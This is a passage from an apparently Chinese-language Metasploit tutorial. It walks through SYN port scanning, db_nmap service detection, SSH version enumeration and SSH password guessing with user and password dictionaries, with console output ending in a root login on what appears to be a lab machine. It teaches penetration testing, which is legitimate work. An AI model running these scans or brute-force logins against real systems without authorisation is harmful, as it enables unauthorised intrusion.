PS:针对内置辅助模块和系统工具扫描结果来看,后者多了一个发现主机的MAC地址信息。当然这里也可以使用Nmap来进行探测存活主机情况。

端口扫描

Metasploit 的辅助模块中提供了几款实用的端口扫描器。

use auxiliary/scanner/portscan/ack use auxiliary/scanner/portscan/tcp use auxiliary/scanner/portscan/ftpbounce use auxiliary/scanner/portscan/xmas use auxiliary/scanner/portscan/syn 

一般情况下推荐使用 syn 端口扫描器,因为他的扫描速度较快,结果比较准确且不易被对方察觉。

msf5 auxiliary(scanner/discovery/arp_sweep) > back msf5 > use auxiliary/scanner/portscan/syn msf5 auxiliary(scanner/portscan/syn) > show options Module options (auxiliary/scanner/portscan/syn): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set DELAY 0 yes The delay between connections, per thread, in milliseconds INTERFACE no The name of the interface JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads (max one per host) TIMEOUT 500 yes The reply read timeout in milliseconds msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.33.6.151 rhosts => 192.33.6.151 msf5 auxiliary(scanner/portscan/syn) > set ports 1-65535 ports => 1-65535 msf5 auxiliary(scanner/portscan/syn) > set threads 50 threads => 50 msf5 auxiliary(scanner/portscan/syn) > show options Module options (auxiliary/scanner/portscan/syn): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set DELAY 0 yes The delay between connections, per thread, in milliseconds INTERFACE no The name of the interface JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. PORTS 1-65535 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.33.6.151 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' SNAPLEN 65535 yes The number of bytes to capture THREADS 50 yes The number of concurrent threads (max one per host) TIMEOUT 500 yes The reply read timeout in milliseconds msf5 auxiliary(scanner/portscan/syn) > run [+] TCP OPEN 192.33.6.151:135 [+] TCP OPEN 192.33.6.151:139 [+] TCP OPEN 192.33.6.151:445 ^C[*] Caught interrupt from the console... [*] Auxiliary module execution completed msf5 auxiliary(scanner/portscan/syn) > 

探测服务详细信息

  • 调用执行MSF封装集成的Nmap

Nmap能够很好地与Metasploit渗透测试数据库集成在一起,可以方便地在Metasploit终端中使用db_nmap,该命令是Nmap的一个封装,与Nmap使用方法完全一致,不同的是其执行结果将自动输人到数据库中,所以要使用db_nmap前提需要已连接上postgresql数据库

msf5 > db_status [*] Connected to msf. Connection type: postgresql. msf5 > 

查看db_nmap命令帮助信息

msf5 > db_nmap -h [*] Nmap 7.80 ( https://nmap.org ) [*] Usage: nmap [Scan Type(s)] [Options] {target specification} [*] TARGET SPECIFICATION: [*] Can pass hostnames, IP addresses, networks, etc. [*] Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 [*] -iL <inputfilename>: Input from list of hosts/networks [*] -iR <num hosts>: Choose random targets [*] --exclude <host1[,host2][,host3],...>: Exclude hosts/networks [*] --excludefile <exclude_file>: Exclude list from file [*] HOST DISCOVERY: [*] -sL: List Scan - simply list targets to scan [*] -sn: Ping Scan - disable port scan [*] -Pn: Treat all hosts as online -- skip host discovery [*] -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports [*] -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes [*] -PO[protocol list]: IP Protocol Ping [*] -n/-R: Never do DNS resolution/Always resolve [default: sometimes] [*] --dns-servers <serv1[,serv2],...>: Specify custom DNS servers [*] --system-dns: Use OS's DNS resolver [*] --traceroute: Trace hop path to each host [*] SCAN TECHNIQUES: [*] -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans [*] -sU: UDP Scan [*] -sN/sF/sX: TCP Null, FIN, and Xmas scans [*] --scanflags <flags>: Customize TCP scan flags [*] -sI <zombie host[:probeport]>: Idle scan [*] -sY/sZ: SCTP INIT/COOKIE-ECHO scans [*] -sO: IP protocol scan [*] -b <FTP relay host>: FTP bounce scan [*] PORT SPECIFICATION AND SCAN ORDER: [*] -p <port ranges>: Only scan specified ports [*] Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9 [*] --exclude-ports <port ranges>: Exclude the specified ports from scanning [*] -F: Fast mode - Scan fewer ports than the default scan [*] -r: Scan ports consecutively - don't randomize [*] --top-ports <number>: Scan <number> most common ports [*] --port-ratio <ratio>: Scan ports more common than <ratio> [*] SERVICE/VERSION DETECTION: [*] -sV: Probe open ports to determine service/version info [*] --version-intensity <level>: Set from 0 (light) to 9 (try all probes) [*] --version-light: Limit to most likely probes (intensity 2) [*] --version-all: Try every single probe (intensity 9) [*] --version-trace: Show detailed version scan activity (for debugging) [*] SCRIPT SCAN: [*] -sC: equivalent to --script=default [*] --script=<Lua scripts>: <Lua scripts> is a comma separated list of [*] directories, script-files or script-categories [*] --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts [*] --script-args-file=filename: provide NSE script args in a file [*] --script-trace: Show all data sent and received [*] --script-updatedb: Update the script database. [*] --script-help=<Lua scripts>: Show help about scripts. [*] <Lua scripts> is a comma-separated list of script-files or [*] script-categories. [*] OS DETECTION: [*] -O: Enable OS detection [*] --osscan-limit: Limit OS detection to promising targets [*] --osscan-guess: Guess OS more aggressively [*] TIMING AND PERFORMANCE: [*] Options which take <time> are in seconds, or append 'ms' (milliseconds), [*] 's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m). [*] -T<0-5>: Set timing template (higher is faster) [*] --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes [*] --min-parallelism/max-parallelism <numprobes>: Probe parallelization [*] --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies [*] probe round trip time. [*] --max-retries <tries>: Caps number of port scan probe retransmissions. [*] --host-timeout <time>: Give up on target after this long [*] --scan-delay/--max-scan-delay <time>: Adjust delay between probes [*] --min-rate <number>: Send packets no slower than <number> per second [*] --max-rate <number>: Send packets no faster than <number> per second [*] FIREWALL/IDS EVASION AND SPOOFING: [*] -f; --mtu <val>: fragment packets (optionally w/given MTU) [*] -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys [*] -S <IP_Address>: Spoof source address [*] -e <iface>: Use specified interface [*] -g/--source-port <portnum>: Use given port number [*] --proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies [*] --data <hex string>: Append a custom payload to sent packets [*] --data-string <string>: Append a custom ASCII string to sent packets [*] --data-length <num>: Append random data to sent packets [*] --ip-options <options>: Send packets with specified ip options [*] --ttl <val>: Set IP time-to-live field [*] --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address [*] --badsum: Send packets with a bogus TCP/UDP/SCTP checksum [*] OUTPUT: [*] -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, [*] and Grepable format, respectively, to the given filename. [*] -oA <basename>: Output in the three major formats at once [*] -v: Increase verbosity level (use -vv or more for greater effect) [*] -d: Increase debugging level (use -dd or more for greater effect) [*] --reason: Display the reason a port is in a particular state [*] --open: Only show open (or possibly open) ports [*] --packet-trace: Show all packets sent and received [*] --iflist: Print host interfaces and routes (for debugging) [*] --append-output: Append to rather than clobber specified output files [*] --resume <filename>: Resume an aborted scan [*] --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML [*] --webxml: Reference stylesheet from Nmap.Org for more portable XML [*] --no-stylesheet: Prevent associating of XSL stylesheet w/XML output [*] MISC: [*] -6: Enable IPv6 scanning [*] -A: Enable OS detection, version detection, script scanning, and traceroute [*] --datadir <dirname>: Specify custom Nmap data file location [*] --send-eth/--send-ip: Send using raw ethernet frames or IP packets [*] --privileged: Assume that the user is fully privileged [*] --unprivileged: Assume the user lacks raw socket privileges [*] -V: Print version number [*] -h: Print this help summary page. [*] EXAMPLES: [*] nmap -v -A scanme.nmap.org [*] nmap -v -sn 192.168.0.0/16 10.0.0.0/8 [*] nmap -v -iR 10000 -Pn -p 80 [*] SEE THE MAN PAGE (https://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES msf5 > 

探测服务详细信息

msf5 > db_nmap -Pn -sV 192.33.6.151 [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-24 04:25 EDT [*] Nmap: Nmap scan report for 192.33.6.151 [*] Nmap: Host is up (0.00060s latency). [*] Nmap: Not shown: 990 closed ports [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 135/tcp open msrpc Microsoft Windows RPC [*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn [*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) [*] Nmap: 3389/tcp open ms-wbt-server? [*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC [*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC [*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC [*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC [*] Nmap: 49156/tcp open msrpc Microsoft Windows RPC [*] Nmap: 49157/tcp open msrpc Microsoft Windows RPC [*] Nmap: MAC Address: 00:0C:29:FB:6F:2E (VMware) [*] Nmap: Service Info: Host: WIN-5DTIE0M734E; OS: Windows; CPE: cpe:/o:microsoft:windows [*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 87.94 seconds msf5 > 

将数据库中的扫描结果导出

msf5 > db_export -f xml 1 [*] Starting export of workspace default to 1 [ xml ]... [*] Finished export of workspace default to 1 [ xml ]... msf5 > ls [*] exec: ls 1 Desktop Documents Downloads Music Pictures Public Templates Videos msf5 > 

查看导出文件内容

<?xml version="1.0" encoding="UTF-8"?> <MetasploitV5> <generated time="2020-06-24 08:29:14 UTC" user="qftm" project="default" product="framework"/> <hosts> <host> <id>1</id> <created-at>2020-06-24 08:26:50 UTC</created-at> <address>192.33.6.151</address> <mac>00:0c:29:fb:6f:2e</mac> <comm></comm> <name/> <state>alive</state> <os-name>Unknown</os-name> <os-flavor/> <os-sp/> <os-lang/> <arch/> <workspace-id>1</workspace-id> <updated-at>2020-06-24 08:26:51 UTC</updated-at> <purpose>device</purpose> <info/> <comments/> <scope/> <virtual-host/> <note-count>0</note-count> <vuln-count>0</vuln-count> <service-count>10</service-count> <host-detail-count>0</host-detail-count> <exploit-attempt-count>0</exploit-attempt-count> <cred-count>0</cred-count> <detected-arch/> <os-family/> <host_details> </host_details> <exploit_attempts> </exploit_attempts> <services> <service> <id>1</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>135</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>2</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>139</port> <proto>tcp</proto> <state>open</state> <name>netbios-ssn</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows netbios-ssn</info> </service> <service> <id>3</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>445</port> <proto>tcp</proto> <state>open</state> <name>microsoft-ds</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP</info> </service> <service> <id>4</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>3389</port> <proto>tcp</proto> <state>open</state> <name>ms-wbt-server</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info></info> </service> <service> <id>5</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>49152</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>6</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>49153</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>7</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>49154</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>8</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>49155</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>9</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:51 UTC</created-at> <port>49156</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:51 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>10</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:51 UTC</created-at> <port>49157</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:51 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> </services> <notes> </notes> <vulns> </vulns> </host> </hosts> <events> <event> <id>1</id> <workspace-id>1</workspace-id> <host-id/> <created-at>2020-06-24 08:23:38 UTC</created-at> <name>ui_start</name> <updated-at>2020-06-24 08:23:38 UTC</updated-at> <critical/> <seen/> <username/> <info>BAh7BjoNcmV2aXNpb24iDyRSZXZpc2lvbiQ=</info> </event> <event> <id>2</id> <workspace-id>1</workspace-id> <host-id/> <created-at>2020-06-24 08:23:38 UTC</created-at> <name>ui_command</name> <updated-at>2020-06-24 08:23:38 UTC</updated-at> <critical/> <seen/> <username/> <info>BAh7BjoMY29tbWFuZCILYmFubmVy</info> </event> <event> <id>3</id> <workspace-id>1</workspace-id> <host-id/> <created-at>2020-06-24 08:23:42 UTC</created-at> <name>ui_command</name> <updated-at>2020-06-24 08:23:42 UTC</updated-at> <critical/> <seen/> <username/> <info>BAh7BjoMY29tbWFuZCIOZGJfc3RhdHVz</info> </event> <event> <id>4</id> <workspace-id>1</workspace-id> <host-id/> <created-at>2020-06-24 08:25:22 UTC</created-at> <name>ui_command</name> <updated-at>2020-06-24 08:25:22 UTC</updated-at> <critical/> <seen/> <username/> <info>BAh7BjoMY29tbWFuZCIhZGJfbm1hcCAtUG4gLXNWIDE5Mi4zMy42LjE1MQ==</info> </event> <event> <id>5</id> <workspace-id>1</workspace-id> <host-id/> <created-at>2020-06-24 08:27:27 UTC</created-at> <name>ui_command</name> <updated-at>2020-06-24 08:27:27 UTC</updated-at> <critical/> <seen/> <username/> <info>BAh7BjoMY29tbWFuZCIKaG9zdHM=</info> </event> <event> <id>6</id> <workspace-id>1</workspace-id> <host-id/> <created-at>2020-06-24 08:28:41 UTC</created-at> <name>ui_command</name> <updated-at>2020-06-24 08:28:41 UTC</updated-at> <critical/> <seen/> <username/> <info>BAh7BjoMY29tbWFuZCIRZGJfZXhwb3J0IC1o</info> </event> <event> <id>7</id> <workspace-id>1</workspace-id> <host-id/> <created-at>2020-06-24 08:29:03 UTC</created-at> <name>ui_command</name> <updated-at>2020-06-24 08:29:03 UTC</updated-at> <critical/> <seen/> <username/> <info>BAh7BjoMY29tbWFuZCIbZGJfZXhwb3J0IC1mIHR4dCAxLnR4dA==</info> </event> <event> <id>8</id> <workspace-id>1</workspace-id> <host-id/> <created-at>2020-06-24 08:29:14 UTC</created-at> <name>ui_command</name> <updated-at>2020-06-24 08:29:14 UTC</updated-at> <critical/> <seen/> <username/> <info>BAh7BjoMY29tbWFuZCIXZGJfZXhwb3J0IC1mIHhtbCAx</info> </event> </events> <services> <service> <id>1</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>135</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>2</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>139</port> <proto>tcp</proto> <state>open</state> <name>netbios-ssn</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows netbios-ssn</info> </service> <service> <id>3</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>445</port> <proto>tcp</proto> <state>open</state> <name>microsoft-ds</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP</info> </service> <service> <id>4</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>3389</port> <proto>tcp</proto> <state>open</state> <name>ms-wbt-server</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info></info> </service> <service> <id>5</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>49152</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>6</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>49153</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>7</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>49154</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>8</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:50 UTC</created-at> <port>49155</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:50 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>9</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:51 UTC</created-at> <port>49156</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:51 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> <service> <id>10</id> <host-id>1</host-id> <created-at>2020-06-24 08:26:51 UTC</created-at> <port>49157</port> <proto>tcp</proto> <state>open</state> <name>msrpc</name> <updated-at>2020-06-24 08:26:51 UTC</updated-at> <info>Microsoft Windows RPC</info> </service> </services> <web_sites> </web_sites> <web_pages> </web_pages> <web_forms> </web_forms> <web_vulns> </web_vulns> <module_details> </module_details> </MetasploitV5> 
  • 调用执行系统Nmap

在msf控制台中可以调用系统中的命令,比如可以使用 Nmap 探测目标的详细服务信息。

nmap -sV -p- 192.33.6.151 msf5 > nmap -sV -p- 192.33.6.151 [*] exec: nmap -sV -p- 192.33.6.151 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 22:19 EDT Nmap scan report for 192.33.6.151 Host is up (0.00034s latency). Not shown: 65525 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC MAC Address: 00:0C:29:FB:6F:2E (VMware) Service Info: Host: WIN-5DTIE0M734E; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 82.81 seconds msf5 > 

服务查点

很多网络服务是漏洞频发的高危对象,对网络上的特定服务进行扫描,往往能让我们少走弯路,增加渗透成功的几率。确定开放端口后,通常会对相应端口,上所运行服务的信息进行更深人的挖掘,通常称为服务查点。

在 Metasploit 的辅助模块中,有很多用于服务扫描和查点的工具,这些工具通常以

[service_name]_version 

命名。该模块可用于遍历网络中包含某种服务的主机,并进一步确定服务的版本。

  • SSH 服务查点

SSH是类UNIX系统上最常见的远程管理服务,与Telnet 不同的是,它采用了安全的加密信息传输方式。通常管理员会使用SSH对服务器进行远程管理,服务器会向SSH客户端返回一个远程的Shell连接。如果没有做其他的安全增强配置(如限制管理登录的IP地址),只要获取服务器的登录口令,就可以使用SSH客户端登录服务器,那就相当于获得了相应登录用户的所有权限。

扫描网络中开放 SSH 服务的所有主机。

ssh_version use auxiliary/scanner/ssh/ssh_version msf5 auxiliary(scanner/portscan/syn) > use auxiliary/scanner/ssh/ssh_version msf5 auxiliary(scanner/ssh/ssh_version) > info Name: SSH Version Scanner Module: auxiliary/scanner/ssh/ssh_version License: Metasploit Framework License (BSD) Rank: Normal Provided by: Daniel van Eeden <metasploit@myname.nl> Check supported: No Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 22 yes The target port (TCP) THREADS 1 yes The number of concurrent threads (max one per host) TIMEOUT 30 yes Timeout for the SSH probe Description: Detect SSH Version. References: http://en.wikipedia.org/wiki/SecureShell msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.33.6.0/24 rhosts => 192.33.6.0/24 msf5 auxiliary(scanner/ssh/ssh_version) > set threads 50 threads => 50 msf5 auxiliary(scanner/ssh/ssh_version) > set timeout 10 timeout => 10 msf5 auxiliary(scanner/ssh/ssh_version) > run [*] 192.33.6.0/24:22 - Scanned 52 of 256 hosts (20% complete) [*] 192.33.6.0/24:22 - Scanned 79 of 256 hosts (30% complete) [*] 192.33.6.0/24:22 - Scanned 102 of 256 hosts (39% complete) [+] 192.33.6.150:22 - SSH server version: SSH-2.0-OpenSSH_8.1p1 Debian-5 ( service.version=8.1p1 openssh.comment=Debian-5 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:8.1p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner ) [*] 192.33.6.0/24:22 - Scanned 117 of 256 hosts (45% complete) [*] 192.33.6.0/24:22 - Scanned 138 of 256 hosts (53% complete) [*] 192.33.6.0/24:22 - Scanned 178 of 256 hosts (69% complete) [*] 192.33.6.0/24:22 - Scanned 194 of 256 hosts (75% complete) [*] 192.33.6.0/24:22 - Scanned 222 of 256 hosts (86% complete) [*] 192.33.6.0/24:22 - Scanned 231 of 256 hosts (90% complete) [*] 192.33.6.0/24:22 - Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/ssh/ssh_version) > 

从结果看到,检测到主机192.33.6.150开放了22端口SSH服务

  • 其他服务查点

使用search进行特定搜索

msf5 > search type:auxiliary path:_version Matching Modules ================  - ---- --------------- ---- ----- ----------- 0 auxiliary/fuzzers/ssh/ssh_version_15 normal No SSH 1.5 Version Fuzzer 1 auxiliary/fuzzers/ssh/ssh_version_2 normal No SSH 2.0 Version Fuzzer 2 auxiliary/fuzzers/ssh/ssh_version_corrupt normal No SSH Version Corruption 3 auxiliary/gather/ibm_sametime_version 2013-12-27 normal No IBM Lotus Sametime Version Enumeration 4 auxiliary/scanner/db2/db2_version normal No DB2 Probe Utility 5 auxiliary/scanner/ftp/ftp_version normal No FTP Version Scanner 6 auxiliary/scanner/h323/h323_version normal No H.323 Version Scanner 7 auxiliary/scanner/http/coldfusion_version normal No ColdFusion Version Scanner 8 auxiliary/scanner/http/docker_version normal No Docker Server Version Scanner 9 auxiliary/scanner/http/http_version normal No HTTP Version Detection 10 auxiliary/scanner/http/joomla_version normal No Joomla Version Scanner 11 auxiliary/scanner/http/sap_businessobjects_version_enum normal No SAP BusinessObjects Version Detection 12 auxiliary/scanner/http/ssl_version 2014-10-14 normal No HTTP SSL/TLS Version Detection (POODLE scanner) 13 auxiliary/scanner/imap/imap_version normal No IMAP4 Banner Grabber 14 auxiliary/scanner/ipmi/ipmi_version normal No IPMI Information Discovery 15 auxiliary/scanner/lotus/lotus_domino_version normal No Lotus Domino Version 16 auxiliary/scanner/memcached/memcached_udp_version 2003-07-23 normal No Memcached UDP Version Scanner 17 auxiliary/scanner/mysql/mysql_version normal No MySQL Server Version Enumeration 18 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query 19 auxiliary/scanner/pop3/pop3_version normal No POP3 Banner Grabber 20 auxiliary/scanner/postgres/postgres_version normal No PostgreSQL Version Probe 21 auxiliary/scanner/printer/printer_version_info normal No Printer Version Information Scanner 22 auxiliary/scanner/sap/sap_mgmt_con_version normal No SAP Management Console Version Detection 23 auxiliary/scanner/scada/digi_addp_version normal No Digi ADDP Information Discovery 24 auxiliary/scanner/scada/digi_realport_version normal No Digi RealPort Serial Server Version 25 auxiliary/scanner/smb/smb_version normal No SMB Version Detection 26 auxiliary/scanner/smtp/smtp_version normal No SMTP Banner Grabber 27 auxiliary/scanner/snmp/aix_version normal No AIX SNMP Scanner Auxiliary Module 28 auxiliary/scanner/ssh/ssh_version normal No SSH Version Scanner 29 auxiliary/scanner/telnet/lantronix_telnet_version normal No Lantronix Telnet Service Banner Detection 30 auxiliary/scanner/telnet/telnet_version normal No Telnet Service Banner Detection 31 auxiliary/scanner/vmware/vmauthd_version normal No VMWare Authentication Daemon Version Scanner 32 auxiliary/scanner/vxworks/wdbrpc_version normal No VxWorks WDB Agent Version Scanner msf5 > 

口令猜测

对于发现的系统与文件管理类网络服务,比如Telnet、SSH、 FTP 等,可以进行弱口令的猜测,以及对明文传输口令的嗅探,从而尝试获取直接通过这些服务进人目标网络的通道。

同样在 Metasploit 的辅助模块中,有很多用于服务口令猜解的工具,这些工具通常以

[service_name]_login 

命名。

  • SSH 服务口令猜解

在确定了网络上的 SSH 服务之后,可以使用 MSF 中的ssh_login 模块对 SSH 服务进行口令猜测攻击,在进行口令攻击之前,需要一个好用的用户名和口令字典。

msf5 > use auxiliary/scanner/ssh/ssh_login msf5 auxiliary(scanner/ssh/ssh_login) > show options Module options (auxiliary/scanner/ssh/ssh_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.33.6.150 rhosts => 192.33.6.150 msf5 auxiliary(scanner/ssh/ssh_login) > set UseR_FILE /home/qftm/Desktop/dic/user UseR_FILE => /home/qftm/Desktop/dic/user msf5 auxiliary(scanner/ssh/ssh_login) > set PaSS_FiLE /home/qftm/Desktop/dic/pass PaSS_FiLE => /home/qftm/Desktop/dic/pass msf5 auxiliary(scanner/ssh/ssh_login) > set BLANK_PASSWORDS true BLANK_PASSWORDS => true msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true VERBOSE => true msf5 auxiliary(scanner/ssh/ssh_login) > show options Module options (auxiliary/scanner/ssh/ssh_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /home/qftm/Desktop/dic/pass no File containing passwords, one per line RHOSTS 192.33.6.150 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /home/qftm/Desktop/dic/user no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts msf5 auxiliary(scanner/ssh/ssh_login) >run [-] 192.33.6.150:22 - Failed: 'root:' [+] 192.33.6.150:22 - Success: 'root:root' 'uid=0(root) gid=0(root) groups=0(root) Linux Pentesting 5.4.0-kali3-amd64 #1 SMP Debian 5.4.13-1kali1 (2020-01-20) x86_64 GNU/Linux ' [*] Command shell session 1 opened (192.33.6.150:45871 -> 192.33.6.150:22) at 2020-06-22 22:50:03 -0400 [-] 192.33.6.150:22 - Failed: 'r00t:' [-] 192.33.6.150:22 - Failed: 'r00t:root' [-] 192.33.6.150:22 - Failed: 'r00t:123456' [-] 192.33.6.150:22 - Failed: 'r00t:woaini' [-] 192.33.6.150:22 - Failed: 'r00t:qftm' [-] 192.33.6.150:22 - Failed: 'r00t:hack' [-] 192.33.6.150:22 - Failed: 'r00t:pass1' [-] 